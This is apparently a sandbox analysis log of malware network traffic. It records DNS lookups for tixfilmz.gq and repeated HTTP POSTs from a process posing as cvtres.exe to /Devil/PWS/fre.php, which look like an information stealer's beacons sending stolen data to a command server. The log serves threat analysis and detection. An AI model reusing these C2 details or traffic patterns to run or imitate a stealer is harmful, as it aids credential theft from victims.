                  Aug 11, 2022 06:43:10.605609894 CEST8.8.8.8192.168.2.30x519aNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:10.605609894 CEST8.8.8.8192.168.2.30x519aNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:11.876543999 CEST8.8.8.8192.168.2.30x3542No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:11.876543999 CEST8.8.8.8192.168.2.30x3542No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:13.137489080 CEST8.8.8.8192.168.2.30x4292No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:13.137489080 CEST8.8.8.8192.168.2.30x4292No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:14.482197046 CEST8.8.8.8192.168.2.30x5a5fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:14.482197046 CEST8.8.8.8192.168.2.30x5a5fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:16.782715082 CEST8.8.8.8192.168.2.30xb95cNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:16.782715082 CEST8.8.8.8192.168.2.30xb95cNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:19.721796036 CEST8.8.8.8192.168.2.30x6e31No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:19.721796036 CEST8.8.8.8192.168.2.30x6e31No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:24.372870922 CEST8.8.8.8192.168.2.30xcf88No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:24.372870922 CEST8.8.8.8192.168.2.30xcf88No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:28.482649088 CEST8.8.8.8192.168.2.30xd243No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:28.482649088 CEST8.8.8.8192.168.2.30xd243No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:31.902369022 CEST8.8.8.8192.168.2.30x829cNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:31.902369022 CEST8.8.8.8192.168.2.30x829cNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:33.857176065 CEST8.8.8.8192.168.2.30xb177No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:33.857176065 CEST8.8.8.8192.168.2.30xb177No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:38.334461927 CEST8.8.8.8192.168.2.30x4896No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:38.334461927 CEST8.8.8.8192.168.2.30x4896No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:40.536607981 CEST8.8.8.8192.168.2.30x86cbNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:40.536607981 CEST8.8.8.8192.168.2.30x86cbNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:42.738006115 CEST8.8.8.8192.168.2.30xdbfeNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:42.738006115 CEST8.8.8.8192.168.2.30xdbfeNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:45.793565989 CEST8.8.8.8192.168.2.30xe80No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:45.793565989 CEST8.8.8.8192.168.2.30xe80No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:47.313312054 CEST8.8.8.8192.168.2.30xc54dNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:47.313312054 CEST8.8.8.8192.168.2.30xc54dNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:48.382242918 CEST8.8.8.8192.168.2.30x4ed0No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:48.382242918 CEST8.8.8.8192.168.2.30x4ed0No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:49.993833065 CEST8.8.8.8192.168.2.30x67d6No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:49.993833065 CEST8.8.8.8192.168.2.30x67d6No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:51.615442038 CEST8.8.8.8192.168.2.30x376fNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:51.615442038 CEST8.8.8.8192.168.2.30x376fNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:53.284096956 CEST8.8.8.8192.168.2.30xe2e0No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:53.284096956 CEST8.8.8.8192.168.2.30xe2e0No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:54.309494972 CEST8.8.8.8192.168.2.30x102bNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:54.309494972 CEST8.8.8.8192.168.2.30x102bNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:55.353864908 CEST8.8.8.8192.168.2.30x84b8No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:55.353864908 CEST8.8.8.8192.168.2.30x84b8No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:58.309959888 CEST8.8.8.8192.168.2.30x312eNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:43:58.309959888 CEST8.8.8.8192.168.2.30x312eNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:00.108901978 CEST8.8.8.8192.168.2.30x8ca9No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:00.108901978 CEST8.8.8.8192.168.2.30x8ca9No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:01.736135960 CEST8.8.8.8192.168.2.30x158eNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:01.736135960 CEST8.8.8.8192.168.2.30x158eNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:03.434765100 CEST8.8.8.8192.168.2.30xe735No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:03.434765100 CEST8.8.8.8192.168.2.30xe735No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:04.894697905 CEST8.8.8.8192.168.2.30xfad3No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:04.894697905 CEST8.8.8.8192.168.2.30xfad3No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:06.132136106 CEST8.8.8.8192.168.2.30xe3c7No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:06.132136106 CEST8.8.8.8192.168.2.30xe3c7No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:07.762610912 CEST8.8.8.8192.168.2.30x9e07No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:07.762610912 CEST8.8.8.8192.168.2.30x9e07No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:08.800934076 CEST8.8.8.8192.168.2.30xc274No error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:08.800934076 CEST8.8.8.8192.168.2.30xc274No error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:09.882337093 CEST8.8.8.8192.168.2.30x366bNo error (0)tixfilmz.gq188.114.97.3A (IP address)IN (0x0001)
                  Aug 11, 2022 06:44:09.882337093 CEST8.8.8.8192.168.2.30x366bNo error (0)tixfilmz.gq188.114.96.3A (IP address)IN (0x0001)
                  • tixfilmz.gq
                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.349742188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:12.661274910 CEST1026OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 190
                  Connection: close
                  Aug 11, 2022 06:42:12.770203114 CEST1027INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:12 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=EcIokiggUeWK7stOcHYaTR9Nfu%2Bw1B0KmIgjz5XBrLi5RlXYADH7OvXr%2FdJTFK4ComS7WX9Kl%2BawzsVO2xC9i7YvxqK%2B2HlQKPAZKDJzBamMX%2Fg9bDYXNFLl8qJ2TA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4da52d366927-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  1192.168.2.349743188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:14.045455933 CEST1028OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 190
                  Connection: close
                  Aug 11, 2022 06:42:14.156966925 CEST1029INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:14 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=hjmr%2BbPvZ8rJwWgffZI2qiEiavpl6O22f%2BcT7CB7tnbyuPOA357Zf2FNxPVWIvbMb8Ndmpi8h9MOOPpjYMpVs8g7ts%2B3HNgz92kV0CK9kX0Lqi1trxOEgmN37zwvtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dadc8f29a21-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  10192.168.2.349752188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:24.044622898 CEST1045OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:24.175990105 CEST1045INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:24 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JxjXC6ddbJvscFIvG67IgynL2NjLWwlHrf9JNEEpnZhz8GESrErKZ%2BoLBEDeoVxgiwJfVn0Q6Rqu8otxBsF8PXAbqITi5CmVFXMAKxISbPKHDQgqi9tRB4N6epT2qg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dec49fdbb79-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  11192.168.2.349753188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:25.207102060 CEST1047OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:25.319336891 CEST1048INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tZTVwoY2KgEFJBINwtqpf4sdTlqYetdrjrRijQZX5Mweayj6DCpYK6tzY8LykMUrMSDsSPGBVilViH644WA9fbXc0g6ig6D5Ubp07wbwXjkLbh86zB8cT4bqPxyqsw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4df39917927a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  12192.168.2.349754188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:26.308314085 CEST1049OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:26.415497065 CEST1050INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:26 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DLqIBQAFj4gswdHMZuHcj91in6E5f6X3rFMoKk2nEIGUMSZ2Nxf9I4OnjRKO0naduLb%2BueBvh97gRd%2BU%2FaetEzg1vRoUKSp6dcqJzvCnpBITGp00qUPZwKWw%2Bj2BeQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4dfa7bdcbb7a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  13192.168.2.349755188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:27.395951986 CEST1051OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:27.495721102 CEST1052INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2BjqGLd6i9zMP8bcIwUWRGVed2wLUSsm3niQjeu0rUJ%2FcbE6oMHKVIi%2BOomjB7LoB%2F4A1uT%2BXqpcZ%2BWLmbZT%2B4dqHCLfO7Pfl1GolCHzGQ5dzsPMqGjmZ7b6xaz7QbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e013cb5693a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  14192.168.2.349756188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:28.447484016 CEST1052OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:28.548753977 CEST1053INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DT2h4w8l%2FP6VjmZr53R42CuyMFDOYqdNxPcSNr2UXMwc5QDOgwXzVoomGjhqGdK%2BBspu1iOAHpJuUv%2BjCNwmP8uG1MIyC10AF9Et%2FDju8VAihCOxHNiSXGyG%2BZWINg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e07da98929c-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  15192.168.2.349757188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:29.610435963 CEST1054OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:29.709315062 CEST1055INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6a1VTXiCKYgnYEO3%2BLpn9oT%2BJ3bOdwQwxtmEYnRXBoF1b2vToJ1LtvkZ1ubI9oYCjF4ZxHdY27qlfBR97QKEKZpuLDGAPkXyaO5gRLySOhDtATM7v%2Bp%2B2VfFc2lo9g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e0f190d9119-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  16192.168.2.349758188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:30.656105042 CEST1056OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:30.750089884 CEST1057INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=pD6Ln9hJRHjfUxa%2BWE43LFbFNzvbGolnLYC5OP0S2USHgWDZw%2FHEYVnJyWrqjinKtzJoFB9DDiks%2BfRYqYcO6kXROO6nZQW0t1xoGJxTokqwElIuBPwLJT667KYPdA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e159a1e915c-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  17192.168.2.349759188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:31.695873976 CEST1058OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:31.798857927 CEST1059INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LklYK3MOypuF1%2BVh2sdCtr7LVNtvn%2F19I6qHXiEHaYlXr1GlNl5FV85gZ1YwjH%2BWP3mMaxA%2FOiai0RRg1k%2FJj1BTJT0GFYgOIysXL7HlbvsawYmrc2QRDHTejstVTw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e1c1b099182-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  18192.168.2.349760188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:32.923604012 CEST1060OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:33.030349016 CEST1061INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JvllRByjfWTtFWpXg1mKOcP73Q4nqUNK9RIelUCIa9JSpEbSgDMsJfWvwFLMqFKuhwzLWUjzARThWb5gHEZ%2B2nNJeog1S%2BjB0M5cAqiaMNoKriWuzsc3a6MuwY9C4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e23c9e2995a-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  19192.168.2.349761188.114.97.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:34.002289057 CEST1062OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:34.089981079 CEST1063INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=HH6Mm6OzeElam41sNPkt1IqJqvterxwkCTH6ccOLDK2%2FP45mgrw2tmT%2FgIuKaBnXiwgm7yZxh1c1twzMg8H%2BZxDubCT3iEDeETTRJWPEP0dPg7eaMyzfviA1nd6Nhw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4e2a8f32bbd9-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  2192.168.2.349744188.114.96.380C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                  TimestampkBytes transferredDirectionData
                  Aug 11, 2022 06:42:15.052087069 CEST1030OUTPOST /Devil/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: tixfilmz.gq
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 4ADFFEA8
                  Content-Length: 163
                  Connection: close
                  Aug 11, 2022 06:42:15.165085077 CEST1031INHTTP/1.1 404 Not Found
                  Date: Thu, 11 Aug 2022 04:42:15 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=M7ABObsXbQcHdnhtJPI8XreO6Qwq10iYwVNciyewQ4rLsb7Pcx09BNdkyXLXs9ydJd52ebLqkg3Ye7uOK2DeXYCKDW1duAcls9jdV3KDrYwI1Ddm7lqJGDb603ptNg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 738e4db41affbbf7-FRA
                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
